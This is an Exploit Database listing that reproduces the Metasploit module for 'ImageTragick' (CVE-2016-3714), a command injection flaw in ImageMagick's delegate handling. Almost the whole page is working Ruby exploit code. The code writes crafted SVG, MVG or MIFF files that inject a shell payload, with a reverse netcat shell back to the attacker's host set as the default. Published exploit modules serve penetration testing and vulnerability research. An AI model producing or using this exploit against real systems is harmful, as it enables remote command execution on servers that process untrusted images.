ImageMagick 6.9.3-9 / 7.0.1-0 – ‘ImageTragick’ Delegate Arbitrary Command Execution (Metasploit)

• Exploit Database
• 17 阅读

• 作者： Metasploit
  日期： 2016-05-09
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/39791/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit
  
  Rank = ExcellentRanking
  
  include Msf::Exploit::FILEFORMAT
  
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'ImageMagick Delegate Arbitrary Command Execution',
  'Description' => %q{
  This module exploits a shell command injection in the way "delegates"
  (commands for converting files) are processed in ImageMagick versions
  <= 7.0.1-0 and <= 6.9.3-9 (legacy).
  
  Since ImageMagick uses file magic to detect file format, you can create
  a .png (for example) which is actually a crafted SVG (for example) that
  triggers the command injection.
  
  Tested on Linux, BSD, and OS X. You'll want to choose your payload
  carefully due to portability concerns. Use cmd/unix/generic if need be.
  },
  'Author'=> [
  'stewie',# Vulnerability discovery
  'Nikolay Ermishkin', # Vulnerability discovery
  'wvu', # Metasploit module
  'hdm'# Metasploit module
  ],
  'References'=> [
  %w{CVE 2016-3714},
  %w{URL https://imagetragick.com/},
  %w{URL http://seclists.org/oss-sec/2016/q2/205},
  %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
  %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
  ],
  'DisclosureDate'=> 'May 3 2016',
  'License' => MSF_LICENSE,
  'Platform'=> 'unix',
  'Arch'=> ARCH_CMD,
  'Privileged'=> false,
  'Payload' => {
  'BadChars'=> "\x22\x27\x5c", # ", ', and \
  'Compat'=> {
  'PayloadType' => 'cmd cmd_bash',
  'RequiredCmd' => 'generic netcat bash-tcp'
  }
  },
  'Targets' => [
  ['SVG file',template: 'msf.svg'], # convert msf.png msf.svg
  ['MVG file',template: 'msf.mvg'], # convert msf.svg msf.mvg
  ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
  ],
  'DefaultTarget' => 0,
  'DefaultOptions'=> {
  'PAYLOAD' => 'cmd/unix/reverse_netcat',
  'LHOST' => Rex::Socket.source_address,
  'DisablePayloadHandler' => false,
  'WfsDelay'=> 9001
  }
  ))
  
  register_options([
  OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
  ])
  end
  
  def exploit
  if target.name == 'SVG file'
  p = Rex::Text.html_encode(payload.encoded)
  else
  p = payload.encoded
  end
  
  file_create(template.sub('echo vulnerable', p))
  end
  
  def template
  File.read(File.join(
  Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
  ))
  end
  
  end